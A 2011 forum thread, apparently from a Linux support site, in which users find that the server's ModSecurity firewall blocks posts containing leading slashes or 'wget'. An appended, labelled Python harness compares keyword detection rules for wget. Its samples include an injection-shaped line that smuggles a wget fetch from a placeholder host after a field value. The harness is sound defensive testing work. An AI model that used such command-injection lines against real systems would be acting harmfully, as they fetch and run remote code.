Post a message with a leading slash

Posted: Sat Jan 01, 2011 12:28 pm
by richb
Edit: This issue has been resolved. You may now post slashes normally. However wget

Code:

[b]w[/b]get
still requires code tags around the w.

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 12:40 pm
by Jerry3904
test, part 1

giving up...

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 12:42 pm
by richb
richb wrote:/
apparently it has been fixed?

EDIT: No still a problem.

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 12:44 pm
by Jerry3904
/ etc/grub

no, still rejected if slash is part of a correct directory address

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 1:00 pm
by Eadwine Rose
/etc/boot

Seems to be working correctly here

used:

Code:

[b]/[/b]etc/boot

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 1:29 pm
by Jerry3904
But try it without the tags, which is what I think Rich was talking about

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 1:40 pm
by richb
Jerry3904 wrote:But try it without the tags, which is what I think Rich was talking about
Yes.

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 1:48 pm
by DBeckett
Trying it here /etc/fstab

Oops. Didn't mean to really post that.

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 1:59 pm
by Eadwine Rose
I get this when I try:


Method Not Implemented

GET to /posting.php not supported.

Additionally, a 500 Internal Server Error error was encountered while trying to use an ErrorDocument to handle the request.

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 2:02 pm
by richb
Eadwine Rose wrote:I get this when I try:


Method Not Implemented

GET to /posting.php not supported.

Additionally, a 500 Internal Server Error error was encountered while trying to use an ErrorDocument to handle the request.
That is correct. You need the code tags.

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 5:02 pm
by GoManutd
bit scary if you're getting a method not implemented for posting something with a slash...

seems like it's trying to execute some sort of macro.

of course, many web based apps that handle user input will prevent slashes and other evil sql characters, or will require that they be properly escaped to prevent sql injection attacks.

don't see this as an issue, rather a security feature

Re: Post a message with a standalone or leading slash

Posted: Mon Jan 03, 2011 3:38 am
by m_pav
It doesn't accept leading forward slashes when they're wrapped up in code tags either and this forum rejects regular text files too.

Mike P

Re: Post a message with a standalone or leading slash

Posted: Mon Jan 03, 2011 4:41 am
by richb
m_pav wrote:It doesn't accept leading forward slashes when they're wrapped up in code tags either and this forum rejects regular text files too.

Mike P
/etc/boot

It accepts slashes with code tags. Do you mean text files as attachments?

Re: Post a message with a standalone or leading slash

Posted: Mon Jan 03, 2011 2:41 pm
by m_pav
Yes to the text files as attachments, it refuses them and actual code tags as in pasted code, not formatting code tags.

Code:

[b]/[/b]etc/X11/xorg.conf
In the above example, the path to xorg.conf is wrapped in code tags, but that brings up the error, so I had to add formatting tags within the code tags for it to work, but the result is sloppy. The issue does not stop with that either. I tried all manner of things like the top left key on a US keyboard, which worked as a carriage return, yet allowed the forward slash
`/etc, so my thoughts are leading towards this forum's back end trying to interpret / as bbcode outside of the [] square brackets

The following seems to support my theory, as hijack is not bbcode, yet it is accepted.
[hijack]
What would be nice is to see a list of permitted attachments and size limitations when adding an attachment
[/hijack]

Mike P

Re: Post a message with a standalone or leading slash

Posted: Mon Jan 03, 2011 3:09 pm
by richb
m_pav wrote:Yes to the text files as attachments, it refuses them and actual code tags as in pasted code, not formatting code tags.

Code:

[b]/[/b]etc/X11/xorg.conf
In the above example, the path to xorg.conf is wrapped in code tags, but that brings up the error, so I had to add formatting tags within the code tags for it to work, but the result is sloppy. The issue does not stop with that either. I tried all manner of things like the top left key on a US keyboard, which worked as a carriage return, yet allowed the forward slash
`/etc, so my thoughts are leading towards this forum's back end trying to interpret / as bbcode outside of the [] square brackets

The following seems to support my theory, as hijack is not bbcode, yet it is accepted.
[hijack]
What would be nice is to see a list of permitted attachments and size limitations when adding an attachment
[/hijack]

Mike P
I have enabled text file attachments.
I only wrap the slash with code tags, to make it post, not the whole path. It posts every time for me.

And Karen has a ticket in to fix it on the server. Please be patient.

EDIT: We are looking into adding that info real time, but it may be difficult. In the interim, I have posted the information in the How-To forum.
EDIT2: The How-To will have to do. Implementing file attachment information when adding an attachment is very difficult for technical reasons. Perhaps in a future version of phpBB it will be added by the developers.

Re: Post a message with a standalone or leading slash

Posted: Wed Jan 26, 2011 3:32 pm
by wireman
Problem is this looks really ugly when trying to quote contents of files within a code block. Anyone know how to get code blocks to show leading '/' correctly without having to put something around it...?

e.g. this looks very bad:

Code:

[i]/[/i]etc/fstab

Re: Post a message with a standalone or leading slash

Posted: Wed Jan 26, 2011 3:35 pm
by richb
wireman wrote:Problem is this looks really ugly when trying to quote contents of files within a code block. Anyone know how to get code blocks to show leading '/' correctly without having to put something around it...?

e.g. this looks very bad:

Code:

[i]/[/i]etc/fstab
Currently there is no way that I know of. That is what we are trying to fix with the server people.

Re: Post a message with a standalone or leading slash

Posted: Wed Jan 26, 2011 4:08 pm
by wireman
Currently there is no way that I know of. That is what we are trying to fix with the server people.
OK. Here's hoping you get a solution.

Re: Post a message with a standalone or leading slash

Posted: Wed Jan 26, 2011 5:48 pm
by lucky9
/home/user/ should work also. And I think it looks better.

PS: I got another server error when originally posting this post.

Re: Post a message with a standalone or leading slash

Posted: Wed Jan 26, 2011 6:24 pm
by GoManutd
i've found the source of the error. it's a security feature that needs to be tweaked. it is not forum software related.

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 10:40 am
by cookdav
Hmmm...this problem is 'messy'. I've got a reply (that I've saved), and no matter what I try,
I can't seem to find any way to NOT get this 'method not implemented' error when I try
to view/post it.

Maybe I'm misunderstanding the 'rules'?

My prospective post has some normal forward-slashed directory and file references, in 2 or 3
places. So, I need the tags around just the first slash, in each occurrence? And, even
when that occurrence is already within 'quoted-string' tags?

[I'm about ready to just give up, and not make the post.]

Is this 'problem' something that is or will-be worked on and fixed? Or, do we all need to now
learn this new method of posting and replying?

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 10:43 am
by Adrian
The problem was solved as far as I know, look: /etc/apt/sources.list. You might have found another security "feature", maybe you have wget in the code?
Try to post (preview) part of what you post and detect where the problem is.

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 10:50 am
by richb
Yes, the slash issue was corrected for this forum and the wiki, and you are able to post normally. If it is a wget we still have that problem. If you put the bold tags around the w only it should post.
wget

Code:

[b]w[/b]get

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 11:50 am
by GoManutd
wouldn't necessarily call it a problem, rather it's a security check that prevents hackers from downloading stuff from the server and/or using our servers to download stuff from elsewhere on the net.

the slash checking rule was modified, but modifying the rule for wget is a bit trickier because it can pose wider issues when checking for server side application names.

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 1:29 pm
by richb
GoManutd wrote:wouldn't necessarily call it a problem, rather it's a security check that prevents hackers from downloading stuff from the server and/or using our servers to download stuff from elsewhere on the net.

the slash checking rule was modified, but modifying the rule for wget is a bit trickier because it can pose wider issues when checking for server side application names.
Thank you for the excellent clarification.

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 1:58 pm
by cookdav
richb wrote:
GoManutd wrote:wouldn't necessarily call it a problem, rather it's a security check that prevents hackers from downloading stuff from the server and/or using our servers to download stuff from elsewhere on the net.

the slash checking rule was modified, but modifying the rule for wget is a bit trickier because it can pose wider issues when checking for server side application names.
Thank you for the excellent clarification.
Not sure I follow why it's a 'security check'. Did we have such limitation/issue in the other forums? Seems to me,
it's a bug or unnecessary side-effect from sloppy coding somewhere in this new 'phpBB' system!?

No, there's no 'wget' in my prospective failing post.

[That said, once I solve this, the issue should go away (for me, at least). So, I will keep working at figuring
out where the problem is.]

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 2:16 pm
by richb
cookdav wrote:
richb wrote:
GoManutd wrote:wouldn't necessarily call it a problem, rather it's a security check that prevents hackers from downloading stuff from the server and/or using our servers to download stuff from elsewhere on the net.

the slash checking rule was modified, but modifying the rule for wget is a bit trickier because it can pose wider issues when checking for server side application names.
Thank you for the excellent clarification.
Not sure I follow why it's a 'security check'. Did we have such limitation/issue in the other forums? Seems to me,
it's a bug or unnecessary side-effect from sloppy coding somewhere in this new 'phpBB' system!?

No, there's no 'wget' in my prospective failing post.

[That said, once I solve this, the issue should go away (for me, at least). So, I will keep working at figuring
out where the problem is.]
It is not the phpBB software, nor is it any coding sloppiness. It is the server we are on that has the security feature deliberately put in place. It is a different server than ML was on, and it is a shared server. The security features have been implemented by the person we share with. GoManutd has helped with the server questions and can give a far better explanation than I can.

If you like you can send me the post on my private email. If you PM me I will give you my email address.

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 2:21 pm
by GoManutd
it's an awesome piece of software called modsecurity. it's essentially a web application firewall - instead of sniffing packets it looks at payloads.

what it helps prevent are things like sql injection attacks, well known attacks, as well as providing a level of protection against unknown/undocumented attacks.

so things like sending a payload to an app that the sql server would execute and, say, turn around and send back /etc/passwd

it really is a required piece of software for any web server, as web applications become increasingly complex and interact with other web services that may, or may not be under the same "roof".

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 7:48 pm
by cookdav
Oops...yes, there IS a w-get, which was the cause of my grief.

[Putting tags around the w wasn't quite the total answer, because then those tags don't disappear
when you view it, if the w-get is within a larger 'code' tagged sequence, so I had to eliminate the code tags.]

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 7:56 pm
by richb
cookdav wrote:Oops...yes, there IS a w-get, which was the cause of my grief.

[Putting tags around the w wasn't quite the right answer, because then those tags don't disappear
when you view it, if the w-get is within a larger 'code' tagged sequence, so I had to eliminate the code tags.]
Correct. In a regular posting they will make the w appear bold. In code they show as the tags. Which is as expected since code is exactly that, and will show any code tags. Sorry that was a bit redundant, but I could not find another way to express it.

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 9:33 pm
by GoManutd
improving the regular expressions that, when a match is found, trigger events is still on the list to research.

ideally, using code tags for something that is, essentially code and not have to use bold on single letters is what is being aimed for. but right now, i have regenerative biology and advanced microbio - doesn't leave much spare brain computation time in my already aged synapses...
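
Added example (not part of the thread, and not the server's actual ModSecurity rules, which are never shown here): a small harness that scores a keyword-style rule set against a context-aware one on the kinds of posts discussed above, to show the false-positive trade-off being described. The patterns, rule names and sample requests are assumptions constructed for illustration.

```python
import re

# Hypothetical patterns for illustration only: the thread never shows the
# server's actual ModSecurity rules, so these just reproduce the behaviour
# the posters describe.
NAIVE_RULES = {
    "leading_slash": re.compile(r"(?:^|\s)/"),
    "tool_keyword": re.compile(r"wget", re.IGNORECASE),
}

# Tuned variant: only fire when the tool name follows a shell command
# separator or substitution and is given an argument.
TUNED_RULES = {
    "tool_in_shell_context": re.compile(
        r"(?:[;|&`]|\$\()\s*wget\s+\S", re.IGNORECASE
    ),
}

# Constructed samples: (request text, is it injection-shaped?).
# The post bodies mirror text from the thread; the two command lines
# are constructed.
SAMPLES = [
    ("/etc/fstab", False),
    ("Trying it here /etc/fstab", False),
    ("[b]/[/b]etc/boot", False),
    ("maybe you have wget in the code?", False),
    ("[b]w[/b]get", False),
    ("apt-get update && wget http://example.invalid/pkg.deb", False),
    ("q=1; wget http://example.invalid/a.sh", True),
]

def evaluate(rules, samples):
    """Return (false_positives, missed) for a rule set over labelled samples."""
    false_positives, missed = [], []
    for text, is_injection in samples:
        hit = any(rx.search(text) for rx in rules.values())
        if hit and not is_injection:
            false_positives.append(text)
        elif not hit and is_injection:
            missed.append(text)
    return false_positives, missed

if __name__ == "__main__":
    for label, rules in (("naive", NAIVE_RULES), ("tuned", TUNED_RULES)):
        fp, missed = evaluate(rules, SAMPLES)
        print(f"{label}: {len(fp)} false positives, {len(missed)} missed")
        for text in fp:
            print("   blocked legitimate post:", text)
```

The tuned pattern still blocks a shell one-liner that a user legitimately pastes into a help post, which is why pattern tuning alone does not fully solve the problem on a forum where commands are normal content.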